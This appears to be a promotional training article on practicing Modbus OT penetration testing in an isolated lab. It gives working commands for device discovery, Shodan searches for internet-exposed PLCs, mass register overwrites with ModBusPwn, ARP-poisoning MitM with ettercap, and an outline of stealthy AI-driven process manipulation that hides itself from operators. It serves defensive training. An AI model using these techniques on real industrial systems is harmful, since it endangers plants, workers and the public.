From Zero to Modbus Mayhem: How to Practice OT Penetration Testing Without Breaking the Law (or a Plant) + Video

Listen to this Post

Featured Image

Introduction:

Operational Technology (OT) environments—the systems that run power grids, water treatment facilities, and manufacturing assembly lines—are increasingly connected to IT networks, yet they remain dangerously exposed. The Modbus TCP protocol, a foundational pillar of industrial communication, transmits data in cleartext without built-in authentication or encryption, making it a prime target for adversaries. For security professionals, the challenge is stark: practicing attacks on a live production plant is illegal and potentially catastrophic, while theoretical knowledge alone fails to build the muscle memory needed to defend against real threats. This article explores a safe, legal, and highly realistic approach to OT penetration testing using isolated lab environments, walking through the complete kill chain—from reconnaissance and traffic analysis to register manipulation and AI-assisted man-in-the-middle attacks.

Learning Objectives:

  • Objective 1: Master OT network reconnaissance techniques to identify and fingerprint industrial devices such as PLCs, HMIs, and historians using Nmap and specialized Modbus scanning tools.
  • Objective 2: Develop hands-on proficiency in analyzing live Modbus TCP traffic, manipulating holding registers, and observing the physical consequences of cyber-physical attacks in a controlled setting.
  • Objective 3: Understand how to execute and detect man-in-the-middle attacks on Modbus networks, including the use of AI to automate packet manipulation and evade traditional intrusion detection systems.

You Should Know:

  1. The Lay of the Land: OT Network Reconnaissance and Device Fingerprinting

The first step in any OT penetration test is understanding the network topology and identifying critical assets. Unlike IT environments where hosts are plentiful and dynamic, OT networks are typically flat, predictable, and populated by specialized devices. The crown jewels are Programmable Logic Controllers (PLCs), Human-Machine Interfaces (HMIs), and historians that log process data.

To begin mapping the network, a targeted Nmap scan is essential. Standard port scans can be intrusive and may crash fragile legacy devices, so using safe, discovery-only scripts is critical. The following command performs a TCP connect scan on port 502 (the default Modbus TCP port) and port 44818 (used by EtherNet/IP), running only non-disruptive discovery scripts:

nmap -sT -p 502,44818 --script modbus-discover,enip-info 192.168.1.0/24

This command identifies live Modbus devices and extracts basic information without sending malicious payloads. For deeper fingerprinting, tools like `modbus-fuzzer` and dedicated frameworks such as ModBusPwn can be used. ModBusPwn is a comprehensive Modbus TCP exploitation framework that provides a full suite of tools for SCADA/ICS reconnaissance, fingerprinting, and exploitation. To detect a PLC’s model, firmware version, and serial number, run:

python3 ModBusPwn.py -t 192.168.1.10 --detect

For broader exposure discovery, ModBusPwn integrates with Shodan to find internet-facing Modbus devices (for authorized research only):

python3 ModBusPwn.py -s -a <YOUR_SHODAN_API_KEY> -c US -l 50 -p 2

On Windows, equivalent reconnaissance can be performed using tools like `ModScan32` or `QModMaster` to poll devices and enumerate register addresses. The key takeaway is that OT reconnaissance is about patience and precision—every packet sent is a potential clue for defenders.

2. Sniffing the Wires: Live Modbus Traffic Analysis

Once devices are identified, the next phase is passive traffic analysis. Modbus TCP operates on port 502 and uses a simple request-response model where a master (e.g., a SCADA system) polls slaves (PLCs) for data. Because the protocol is cleartext, an attacker with network access can capture and interpret all traffic using Wireshark or TShark.

To filter Modbus traffic from a packet capture file on Kali Linux, use:

tshark -r capture.pcapng -Y "tcp.port == 502" -T fields -e ip.src -e ip.dst -e modbus.func_code -e modbus.reference_num

This command extracts source/destination IPs, Modbus function codes, and reference numbers (register addresses), providing a clear picture of which registers are being read or written. Understanding function codes is crucial: code 0x03 reads holding registers, 0x06 writes a single register, and 0x10 writes multiple registers. Holding registers (addresses in the 40000 range) are particularly attractive targets because they store variables that control physical processes—motor speeds, valve positions, temperature setpoints.

In a lab environment like Labshock’s Netfields zone, you can observe live Modbus traffic between a motor assembly line’s PLC and HMI, learning to distinguish normal polling patterns from anomalous commands. This passive phase is about building a baseline: understanding what “normal” looks like so that deviations become obvious.

  1. The Touch: Modbus Register Manipulation and Physical Impact

The most critical phase of an OT penetration test is active exploitation—manipulating registers to affect physical processes. In a production environment, this is illegal and dangerous; in a lab, it’s the core learning experience.

Using the ModBusPwn exploit toolkit, an attacker can scan for writable registers and inject malicious values. To identify writable registers on a target PLC:

python3 ModBusPwn.py -t 192.168.1.10

Then, to write a value (e.g., 9999) to all discovered writable registers:

python3 ModBusPwn.py -t 192.168.1.10 -m 9999

For more granular control, the Metasploit framework includes Modbus auxiliary modules. After launching Metasploit, search for Modbus modules:

msf6 > search modbus

The `auxiliary/scanner/scada/modbus_findunitid` module can enumerate slave IDs, while custom scripts using the `pymodbus` library allow precise register reads and writes. A simple Python script to read a holding register:

from pymodbus.client import ModbusTcpClient
client = ModbusTcpClient('192.168.1.10')
client.connect()
result = client.read_holding_registers(40001, 1)
print(result.registers)
client.close()

The true value of this phase is observing the consequence. In a simulated environment like Netfields, changing a register value causes a motor to speed up, slow down, or stop. This immediate cyber-physical feedback loop teaches the attacker (and defender) how digital actions translate to physical outcomes—a lesson no textbook can provide.

4. The Silent Operator: AI-Powered Man-in-the-Middle Attacks

Modbus’s lack of encryption makes it highly vulnerable to man-in-the-middle (MitM) attacks. By positioning themselves between the master and slave, an attacker can intercept, modify, or drop packets in real time. Traditional MitM attacks use ARP poisoning with tools like Ettercap. On Kali Linux, the command to poison the ARP cache between a controller (IP 10.0.0.1) and an HMI (IP 10.0.0.2) is:

ettercap -T -i eth0 -M arp /10.0.0.1// /10.0.0.2//

However, the real innovation lies in using AI to automate and enhance MitM attacks. An AI model can be trained on normal Modbus traffic patterns to learn the expected values of critical registers. During an attack, the AI can then:

  • Inject subtle deviations: Instead of writing extreme values that trigger alarms, the AI modifies registers by small, incremental amounts that drift the process outside safe parameters over time.
  • Evade detection: The AI can ensure that response packets to the master contain normal-looking values (previously recorded) while the slave receives malicious commands. This “reply attack” makes the intrusion nearly invisible to operators.
  • Adapt in real time: If the defender changes a setpoint, the AI can adjust its manipulation strategy on the fly, maintaining persistence.

Implementing this requires a Python script that uses Scapy to craft and modify packets, integrated with a machine learning model (e.g., an isolation forest or autoencoder) trained on benign traffic. While sophisticated, this approach is becoming increasingly feasible and represents the next frontier in OT security testing.

  1. The Defender’s Dilemma: Detection and Forensics in OT

Every attack generates noise—anomalous packets, out-of-sequence commands, or unexpected register values. For the defender, the goal is to distinguish between a fault (a legitimate malfunction) and an attack. In a lab environment, you can practice both sides: execute an attack and then analyze the traffic to see how it appears in logs and SIEM tools.

Using Zeek (formerly Bro) with custom scripts, you can detect abnormal Modbus activity. For example, a Zeek script can flag any write command to a holding register that exceeds a predefined threshold or originates from an unauthorized IP. On the forensic side, tools like Wireshark’s “Follow TCP Stream” feature allow deep inspection of individual Modbus sessions, revealing exactly what commands were sent and when.

Labshock integrates these detection capabilities, providing a complete OT security lab with a built-in SIEM, IDS, and traffic collector. By practicing attacks and then switching to the blue team role, you build a holistic understanding of the adversarial mindset and the defensive countermeasures needed to protect critical infrastructure.

6. Putting It All Together: The Netfields Experience

The Netfields zone within the Labshock platform embodies the principles discussed above. It is a real industrial network with a motor assembly line, live Modbus traffic, and a process that “fights back” when you touch it. The environment is fully isolated, so there is no risk to production systems and no legal jeopardy.

The prescribed learning path in Netfields is:

  1. Map the network using Nmap and Modbus discovery tools.
  2. Find the PLC, HMI, and historian through fingerprinting.
  3. Analyze Modbus traffic to understand normal behavior and identify writable registers.
  4. Run Kali Linux against the process, using tools like ModBusPwn or Metasploit.
  5. Manipulate a register and watch the motor react in real time.
  6. Observe the impact of your actions on the machine and the network traffic.
  7. Write your own Modbus client to automate attacks.
  8. Use AI to perform a MitM attack, modifying traffic on the fly.

This progression moves from passive reconnaissance to active exploitation and finally to advanced, AI-driven attacks—mirroring the tactics of sophisticated adversaries.

What Undercode Say:

  • Key Takeaway 1: OT security cannot be learned from theory alone. Practicing attacks in a safe, isolated lab is essential to understanding the adversary’s perspective and building effective defenses. Platforms like Labshock and Netfields provide the closest thing to a real plant without the legal and safety risks.

  • Key Takeaway 2: The Modbus protocol is fundamentally insecure, and its widespread use in critical infrastructure makes it a persistent vulnerability. However, by mastering reconnaissance, traffic analysis, and both traditional and AI-enhanced attack techniques, security professionals can develop the skills needed to detect and mitigate these threats before they cause real-world damage.

The analysis reveals a critical gap in the cybersecurity industry: while IT penetration testing is well-established with countless labs and certifications, OT security remains a niche field with limited safe practice opportunities. This is changing. The emergence of accessible, realistic OT lab environments democratizes industrial security training, enabling a new generation of defenders to learn by doing. The ability to safely “touch” a live industrial process—to see a motor move in response to a packet you crafted—is transformative. It builds an intuitive understanding of cyber-physical risk that no amount of slideware can replicate. As AI continues to evolve, the attack surface will only grow, making hands-on, adversarial practice not just beneficial, but imperative.

Prediction:

  • +1 The democratization of OT security labs will accelerate the growth of a skilled industrial cybersecurity workforce, closing the talent gap that currently leaves critical infrastructure vulnerable.

  • +1 AI-driven attack and defense tools will become standard in OT penetration testing, leading to more robust and adaptive security measures that can counter sophisticated, persistent threats.

  • -1 As AI-powered attack tools become more accessible, the barrier to entry for malicious actors will lower, increasing the frequency and sophistication of attacks against industrial targets.

  • -1 The inherent insecurity of legacy protocols like Modbus means that even with improved detection, the fundamental risk of catastrophic cyber-physical failure will persist until widespread migration to secure, authenticated protocols occurs—a process that will take decades given the long lifecycle of industrial equipment.

▶️ Related Video (72% Match):

https://www.youtube.com/watch?v=8a1yTN2kFNw

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Zakharb You – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky